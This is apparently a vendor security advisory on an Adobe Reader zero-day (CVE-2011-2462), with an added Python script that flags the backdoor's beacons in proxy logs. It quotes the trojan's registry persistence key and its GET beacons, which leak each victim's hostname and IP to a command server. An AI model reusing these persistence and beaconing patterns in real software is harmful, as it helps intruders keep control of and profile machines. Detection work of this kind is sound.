Adobe Reader and Acrobat Zero Day exploit
The SonicWALL UTM Research team found reports of a new zero-day vulnerability (CVE-2011-2462) in Adobe Reader and Acrobat affecting Windows, Mac OS X, and Unix operating systems. This U3D memory corruption vulnerability could lead to an application crash and may allow an attacker to gain control of the victim's machine. Adobe issued a security advisory on December 6, 2011 warning users about this flaw.
When opened, the malicious PDF file performs the following activity on the victim machine:
- It drops a backdoor Trojan on the target machine and runs it:
  - (USER)\Local Settings\pretty.exe --- Detected as GAV: Wisp.A_2 (Trojan)
- It creates a registry entry to ensure that the backdoor Trojan runs on system reboot:
  - HKCU\Software\Microsoft\Windows\CurrentVersion\Run\office = "(USER)\Local Settings\pretty.exe"
- The dropped backdoor Trojan then attempts to connect to a remote server, prettyli(REMOVED)com, and sends the following requests:
  - GET /asp/kys_allow_get.asp?s=https&name=getkys.kys&hostname=(HOSTNAME)-(IPADDRESS)-pretty20111122
  - GET /ASP/KYS_ALLOW_PUT.ASP?s=https&TYPE=ptpretty.tmp&hostname=(HOSTNAME)-(IPADDRESS)-pretty20111122
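The two beacon requests above carry the victim's hostname and IP address in the `hostname` parameter, which makes them easy to spot in web proxy logs. The following detection script is an added example, not part of the SonicWALL advisory: it matches the beacon URI paths case-insensitively and decodes the `(HOSTNAME)-(IPADDRESS)-pretty20111122` encoding. The log format and the placeholder C2 host (`c2-placeholder.invalid`, since the real domain is redacted on the page) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample proxy log lines (timestamp, client IP, method, URL, status).
# The C2 domain in the advisory is redacted, so a placeholder host is used here.
SAMPLE_LOG = """\
2011-12-07T10:01:02Z 10.1.2.33 GET http://c2-placeholder.invalid/asp/kys_allow_get.asp?s=https&name=getkys.kys&hostname=WS-0421-10.1.2.33-pretty20111122 200
2011-12-07T10:01:05Z 10.1.2.33 GET http://c2-placeholder.invalid/ASP/KYS_ALLOW_PUT.ASP?s=https&TYPE=ptpretty.tmp&hostname=WS-0421-10.1.2.33-pretty20111122 200
2011-12-07T10:02:00Z 10.1.2.40 GET http://www.example.com/index.html 200
"""

# URI paths quoted in the advisory; the backdoor uses mixed case, so compare lowercased.
BEACON_PATHS = {"/asp/kys_allow_get.asp", "/asp/kys_allow_put.asp"}
# hostname=<HOSTNAME>-<IPADDRESS>-pretty<YYYYMMDD>; hostnames may themselves contain
# hyphens, so anchor on the dotted-quad IP and the trailing build tag instead of splitting.
HOSTNAME_PARAM = re.compile(r"^(?P<host>.+)-(?P<ip>\d{1,3}(?:\.\d{1,3}){3})-(?P<tag>pretty\d{8})$")


def parse_beacon(url):
    """Return a dict describing the beacon if `url` matches the C2 pattern, else None."""
    parts = urlsplit(url)
    if parts.path.lower() not in BEACON_PATHS:
        return None
    params = {k.lower(): v[0] for k, v in parse_qs(parts.query).items()}
    m = HOSTNAME_PARAM.match(params.get("hostname", ""))
    if m is None:
        return None  # right path but not the expected hostname encoding; not a confident match
    return {
        "path": parts.path,
        "victim_host": m.group("host"),
        "victim_ip": m.group("ip"),
        "build_tag": m.group("tag"),
        "payload": params.get("name") or params.get("type"),  # getkys.kys / ptpretty.tmp
    }


def scan_log(text):
    """Scan whitespace-separated proxy log lines and return one finding per C2 beacon."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        ts, client, _method, url = fields[:4]
        hit = parse_beacon(url)
        if hit:
            findings.append({"time": ts, "client": client, **hit})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A mismatch between the proxy's client IP and the IP the beacon reports in `hostname` is worth flagging as well, since it may indicate NAT or a host reporting from behind another gateway.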
The SonicWALL UTM appliance provides protection against this threat via the following signatures:
- GAV: CVE-2011-2462.A (Exploit)
- IPS: Malformed PDF File 14b